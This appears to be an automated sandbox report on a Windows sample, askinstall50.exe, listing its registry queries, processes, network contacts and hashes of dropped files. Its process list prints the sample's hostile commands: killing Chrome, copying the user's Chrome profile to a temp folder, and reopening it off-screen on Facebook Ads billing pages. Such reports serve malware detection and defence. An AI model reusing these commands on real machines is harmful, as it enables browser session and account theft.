| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\xcopy.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\askinstall50.exe
"C:\Users\Admin\AppData\Local\Temp\askinstall50.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
C:\Windows\SysWOW64\xcopy.exe
xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0x7c,0x10c,0x7ffc0e7acc40,0x7ffc0e7acc4c,0x7ffc0e7acc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=284,i,6448410968557946937,1511952786389434810,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1732 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --field-trial-handle=2140,i,6448410968557946937,1511952786389434810,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2172 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --field-trial-handle=2236,i,6448410968557946937,1511952786389434810,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2448 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3100,i,6448410968557946937,1511952786389434810,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3120 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3108,i,6448410968557946937,1511952786389434810,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3156 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3512,i,6448410968557946937,1511952786389434810,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3528 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3536,i,6448410968557946937,1511952786389434810,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3648 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=728,i,6448410968557946937,1511952786389434810,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4208 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.listincode.com | udp |
| US | 52.203.72.196:443 | www.listincode.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.209.201.84.in-addr.arpa | udp |
| US | 54.205.158.59:443 | www.listincode.com | tcp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.187.227:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | 161.74.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.iyiqian.com | udp |
| SG | 13.251.16.150:80 | www.iyiqian.com | tcp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| US | 8.8.8.8:53 | secure.facebook.com | udp |
| GB | 163.70.151.14:443 | secure.facebook.com | tcp |
| GB | 163.70.151.35:443 | www.facebook.com | tcp |
| GB | 163.70.151.35:443 | www.facebook.com | tcp |
| US | 8.8.8.8:53 | 150.16.251.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.213.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.151.70.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.151.70.163.in-addr.arpa | udp |
| GB | 163.70.151.35:443 | www.facebook.com | udp |
| US | 8.8.8.8:53 | static.xx.fbcdn.net | udp |
| GB | 163.70.151.21:443 | static.xx.fbcdn.net | tcp |
| GB | 163.70.151.21:443 | static.xx.fbcdn.net | tcp |
| GB | 163.70.151.21:443 | static.xx.fbcdn.net | tcp |
| GB | 163.70.151.21:443 | static.xx.fbcdn.net | udp |
| GB | 163.70.151.21:443 | static.xx.fbcdn.net | udp |
| US | 8.8.8.8:53 | 21.151.70.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| GB | 142.250.200.42:443 | content-autofill.googleapis.com | tcp |
| GB | 142.250.200.42:443 | content-autofill.googleapis.com | tcp |
| GB | 142.250.200.42:443 | content-autofill.googleapis.com | tcp |
| US | 8.8.8.8:53 | 42.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | facebook.com | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Login Data For Account
| MD5 | a182561a527f929489bf4b8f74f65cd7 |
| SHA1 | 8cd6866594759711ea1836e86a5b7ca64ee8911f |
| SHA256 | 42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914 |
| SHA512 | 9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | d0a8de164afe485a7233e1d55ba4347f |
| SHA1 | c760af9ae23dd96a2b4606881b148c945d74fe7b |
| SHA256 | 5ca88d50743cb188cc6908ea0262995adb8ec4702c441d4b837515e9a2fbfb27 |
| SHA512 | e66b69286f9efa855c753bbee4307383d553c4a53e5ee2677fc67a11750e1f95374cd4fd7f81c3c65fa3683710c88c89ae4af9211ba347ee664522eff648b429 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Code Cache\wasm\index
| MD5 | 54cb446f628b2ea4a5bce5769910512e |
| SHA1 | c27ca848427fe87f5cf4d0e0e3cd57151b0d820d |
| SHA256 | fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d |
| SHA512 | 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Extension Scripts\000003.log
| MD5 | 891a884b9fa2bff4519f5f56d2a25d62 |
| SHA1 | b54a3c12ee78510cb269fb1d863047dd8f571dea |
| SHA256 | e2610960c3757d1757f206c7b84378efa22d86dcf161a98096a5f0e56e1a367e |
| SHA512 | cd50c3ee4dfb9c4ec051b20dd1e148a5015457ee0c1a29fff482e62291b32097b07a069db62951b32f209fd118fd77a46b8e8cc92da3eaae6110735d126a90ee |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Extension Scripts\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Extension Scripts\MANIFEST-000001
| MD5 | 5af87dfd673ba2115e2fcf5cfdb727ab |
| SHA1 | d5b5bbf396dc291274584ef71f444f420b6056f1 |
| SHA256 | f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4 |
| SHA512 | de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\en_CA\messages.json
| MD5 | 07ffbe5f24ca348723ff8c6c488abfb8 |
| SHA1 | 6dc2851e39b2ee38f88cf5c35a90171dbea5b690 |
| SHA256 | 6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c |
| SHA512 | 7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\manifest.json
| MD5 | 9d21061c0fde598f664c196ab9285ce0 |
| SHA1 | b8963499bfb13ab67759048ed357b66042850cd4 |
| SHA256 | 024872f1e0eb6f98dcbd6a9d47820525c03aa0480373f9e247a90a3ef8776514 |
| SHA512 | f62d333e6415be772751eeeaf154dc49012b5fc56b0d2d6276a099d658ebe10f3c5166ec02b215ae9cd05014d7435b53d14b98a20e2af83a7aa09a8babe71853 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\icon.png
| MD5 | c8d8c174df68910527edabe6b5278f06 |
| SHA1 | 8ac53b3605fea693b59027b9b471202d150f266f |
| SHA256 | 9434dd7008059a60d6d5ced8c8a63ab5cae407e7152da98ca4dda408510f08f5 |
| SHA512 | d439e5124399d1901934319535b7156c0ca8d76b5aa4ddf1dd0b598d43582f6d23c16f96be74d3cd5fe764396da55ca51811d08695f356f12f7a8a71bcc7e45c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\background.html
| MD5 | 9ffe618d587a0685d80e9f8bb7d89d39 |
| SHA1 | 8e9cae42c911027aafae56f9b1a16eb8dd7a739c |
| SHA256 | a1064146f622fe68b94cd65a0e8f273b583449fbacfd6fd75fec1eaaf2ec8d6e |
| SHA512 | a4e1f53d1e3bf0ff6893f188a510c6b3da37b99b52ddd560d4c90226cb14de6c9e311ee0a93192b1a26db2d76382eb2350dc30ab9db7cbd9ca0a80a507ea1a12 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\js\jquery-3.3.1.min.js
| MD5 | a09e13ee94d51c524b7e2a728c7d4039 |
| SHA1 | 0dc32db4aa9c5f03f3b38c47d883dbd4fed13aae |
| SHA256 | 160a426ff2894252cd7cebbdd6d6b7da8fcd319c65b70468f10b6690c45d02ef |
| SHA512 | f8da8f95b6ed33542a88af19028e18ae3d9ce25350a06bfc3fbf433ed2b38fefa5e639cddfdac703fc6caa7f3313d974b92a3168276b3a016ceb28f27db0714a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\js\pad-nopadding.js
| MD5 | 0f26002ee3b4b4440e5949a969ea7503 |
| SHA1 | 31fc518828fe4894e8077ec5686dce7b1ed281d7 |
| SHA256 | 282308ebc3702c44129438f8299839ca4d392a0a09fdf0737f08ef1e4aff937d |
| SHA512 | 4290a1aee5601fcbf1eb2beec9b4924c30cd218e94ae099b87ba72c9a4fa077e39d218fc723b8465d259028a6961cc07c0cd6896aa2f67e83f833ca023a80b11 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\js\mode-ecb.js
| MD5 | 23231681d1c6f85fa32e725d6d63b19b |
| SHA1 | f69315530b49ac743b0e012652a3a5efaed94f17 |
| SHA256 | 03164b1ac43853fecdbf988ce900016fb174cf65b03e41c0a9a7bf3a95e8c26a |
| SHA512 | 36860113871707a08401f29ab2828545932e57a4ae99e727d8ca2a9f85518d3db3a4e5e4d46ac2b6ba09494fa9727c033d77c36c4bdc376ae048541222724bc2 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\js\content.js
| MD5 | e49ff8e394c1860bc81f432e7a54320a |
| SHA1 | 091864b1ce681b19fbd8cffd7191b29774faeb32 |
| SHA256 | 241ee3cf0f212f8b46ca79b96cfa529e93348bf78533d11b50db89e416bbabf3 |
| SHA512 | 66c31c7c5409dfdb17af372e2e60720c953dd0976b6ee524fa0a21baaf0cf2d0b5e616d428747a6c0874ec79688915b731254de16acce5d7f67407c3ef82e891 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\js\background.js
| MD5 | c1414213506f83ad9727c8c8a6f2b4de |
| SHA1 | 2b8f5d991c7645b875e360335c374daf923ff1c8 |
| SHA256 | 4ecb179d45e903511dfb1e14848a0a9dbe840a98b0fbb08776a1c3f31cd9bad6 |
| SHA512 | 0c496735031491a811fdd89c0bb13399a1eebc8c0528ef7f31003c3320bbd072aaef8c8af166cf3d066ef90b83b071d09d7f8e13186b674781a3fccc8b9865c2 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\js\aes.js
| MD5 | 4ff108e4584780dce15d610c142c3e62 |
| SHA1 | 77e4519962e2f6a9fc93342137dbb31c33b76b04 |
| SHA256 | fc7e184beeda61bf6427938a84560f52348976bb55e807b224eb53930e97ef6a |
| SHA512 | d6eee0fc02205a3422c16ad120cad8d871563d8fcd4bde924654eac5a37026726328f9a47240cf89ed6c9e93ba5f89c833e84e65eee7db2b4d7d1b4240deaef2 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\en_GB\messages.json
| MD5 | 91f5bc87fd478a007ec68c4e8adf11ac |
| SHA1 | d07dd49e4ef3b36dad7d038b7e999ae850c5bef6 |
| SHA256 | 92f1246c21dd5fd7266ebfd65798c61e403d01a816cc3cf780db5c8aa2e3d9c9 |
| SHA512 | fdc2a29b04e67ddbbd8fb6e8d2443e46badcb2b2fb3a850bbd6198cdccc32ee0bd8a9769d929feefe84d1015145e6664ab5fea114df5a864cf963bf98a65ffd9 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\GPUCache\data_0
| MD5 | cf89d16bb9107c631daabf0c0ee58efb |
| SHA1 | 3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b |
| SHA256 | d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e |
| SHA512 | 8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\GPUCache\data_1
| MD5 | f50f89a0a91564d0b8a211f8921aa7de |
| SHA1 | 112403a17dd69d5b9018b8cede023cb3b54eab7d |
| SHA256 | b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec |
| SHA512 | bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\GPUCache\data_2
| MD5 | 0962291d6d367570bee5454721c17e11 |
| SHA1 | 59d10a893ef321a706a9255176761366115bedcb |
| SHA256 | ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7 |
| SHA512 | f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\GPUCache\index
| MD5 | 95c07d8a71623f41508b2ff47ca82226 |
| SHA1 | d4ad0917270a5006f3be6ca2b19e003d2522ea23 |
| SHA256 | 824639e8587bd6deccb361cd6ccf061e82b76e97745b4cdaf09cf22cf59f4452 |
| SHA512 | e0315b36ce709657de426e5f549864a1de635e86c174379d36757d7deb300a11ac40d5938a32f00e304a1a41c9e5f2eb7806296c898642ffc3b187041c9ad9a9 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\GPUCache\data_3
| MD5 | 41876349cb12d6db992f1309f22df3f0 |
| SHA1 | 5cf26b3420fc0302cd0a71e8d029739b8765be27 |
| SHA256 | e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c |
| SHA512 | e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Shared Dictionary\db
| MD5 | 491de38f19d0ae501eca7d3d7d69b826 |
| SHA1 | 2ecf6fcf189ce6d35139daf427a781ca66a1eba9 |
| SHA256 | e58156bca5288238d341f5249d3b6c91ab37cef515358953b435339100d0596a |
| SHA512 | 232f5df71e8ec35e500ac81aa54a87b3523fe8a32168096a2a76f08e5c7868100b3cdc5155786ead489aac440beee3f84ffa43d226a5b709c66012923b20c696 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\CrashpadMetrics-active.pma
| MD5 | 9a31b075da019ddc9903f13f81390688 |
| SHA1 | d5ed5d518c8aad84762b03f240d90a2d5d9d99d3 |
| SHA256 | 95cf4025babcd46069b425449c98ed15d97d364b2461417caa9aa0c13cb372e1 |
| SHA512 | a04726a429ae727d685f0836327c625d2f18d6327253216a9a31265a324b68b06bec4e7f1b744d261a0e67fa0a90c43719aeda9d2998f42525b0ff5640c7bf1e |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad\settings.dat
| MD5 | 73d076263128b1602fe145cd548942d0 |
| SHA1 | 69fe6ab6529c2d81d21f8c664da47c16c2e663ae |
| SHA256 | f2dd7199b48e34d54ee1a221f654ad9c04d8b606c02bdbe77b33b82fb2df6b29 |
| SHA512 | e371083407ee6a1e3436a3d1ea4e6a84f211c6ad7c501f7a09916a9ada5b50a39dcb9e8be7a4dee664ea88ec33be8c6197c2f0ac2eabe3c0691bc9d0ed4e415d |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Local State
| MD5 | 525dcad5cd7510fb1db76f73f75aa4c8 |
| SHA1 | 45c47fd6ace5dea0960c18cb71334d4e4ef787e9 |
| SHA256 | 85b07f112462c182658e67360d4d7f19951c0d17a6fa8bcdd613063e084ac07f |
| SHA512 | 7c63d7cdee967b8e247f13b094a5f1bab49d07876a4f651b1a653c04f4f545971e6a940aa5f97f5144afe5431434e714ac5707fff790073b7affe09d3e96c634 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Variations
| MD5 | 961e3604f228b0d10541ebf921500c86 |
| SHA1 | 6e00570d9f78d9cfebe67d4da5efe546543949a7 |
| SHA256 | f7b24f2eb3d5eb0550527490395d2f61c3d2fe74bb9cb345197dad81b58b5fed |
| SHA512 | 535f930afd2ef50282715c7e48859cc2d7b354ff4e6c156b94d5a2815f589b33189ffedfcaf4456525283e993087f9f560d84cfcf497d189ab8101510a09c472 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\ShaderCache\index
| MD5 | 623219f1ab995d4382d51862e296993e |
| SHA1 | ab714b5455c3a03280ede906b0341270e5e2b4c3 |
| SHA256 | e50e0bfc2a799dd9fe24d78ab3838d53b4369a435b883918876435c47acf9a78 |
| SHA512 | cf7ea8ed4c3584195803b511b9034695c7ee18d133ed63f51da5e407cc87a90905a2e6264116f67ddb4d0ccc2fff634521906eb04d46250930a6cc19929fd9aa |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Service Worker\Database\000003.log
| MD5 | 9affa7d86177f9faff71da3d0b362a8a |
| SHA1 | e87501e8728e48c18f1cade08a1db2d34d2f9ff1 |
| SHA256 | a6749feae45719cf8d44459a504db910797853d621fb852a6249dde951614601 |
| SHA512 | dce87a80bc86db5efc88a52e4a3e9b5d2095350337c55257bd9373af559bbd57e526ae29bbad088a568dc2a911af3e833e5534f058fb28e7ba7dc672774004d0 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Code Cache\wasm\index-dir\the-real-index
| MD5 | 958d050d7095eb8cd30d40ce0f11e2a2 |
| SHA1 | 26450fb68fbf52fc186c818e1e1a7bfc2f032e4d |
| SHA256 | 6e08721a5c82ad851a413614472bdb782fdf915f5a0bd9d9b5bc0873f9d435cb |
| SHA512 | a542354a8a827b58cfe4c3a7a482bf42695103809d3da5c76e0636852e8eee1f0fac70c6a5c269eb12334edcf0f8a1b837bf7d91920b01ac63951a70c2048bc7 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 1406d8dab3e0d02ba7f59770f81381b4 |
| SHA1 | cf69407626afef95ff156596020a1f506a418a49 |
| SHA256 | b30cffbd85a6c4c0f07e836ea36b6d0d0bec125e2a661847305efa4e3a929b84 |
| SHA512 | 96b9162354ded4cc28073f331e83ca0a0ecc63cbe0b3bb149f3db1d20afef7d4268915f385bdd3d66f3c263ebc59f14f6bdad322cb58ced27c1430e2ab36ae27 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Site Characteristics Database\LOG
| MD5 | 80956a834b72f46c51e89f649cdfa173 |
| SHA1 | e4382255804f7c5223561a3d3463a692f5039c05 |
| SHA256 | 00434965ab2f1b4e8efe87b3f299eb7330b0a7431a773bdbdb5c8aecb5270586 |
| SHA512 | e0410fc06f2bc151347fe040ba4ed4826579309ee69daa40419312e4f18520eb5e51641f732b050397529fc96d5d89e66734871bcd4b59d8552cfec3d3def76c |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Site Characteristics Database\LOG.old
| MD5 | 4c2f8e7e21da97ce7a53b7818adbe77f |
| SHA1 | a28e1abd78bff6831b36b4c6040b30a3352a2dce |
| SHA256 | 812a3e3c992c881bb1bc12418dd16c9c50976924edec8803c73019565f135fd7 |
| SHA512 | c74b6cc358c0c97d8f4a56cc732dcd2cf056d315b2fb73540e15b37fd4922a166c87e0cf321d69c48f351caf58a7f1e2502ba94d28b36251f8f68918b7c6400f |
\??\pipe\crashpad_1516_KSVHIMHQSIYUAHNZ
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
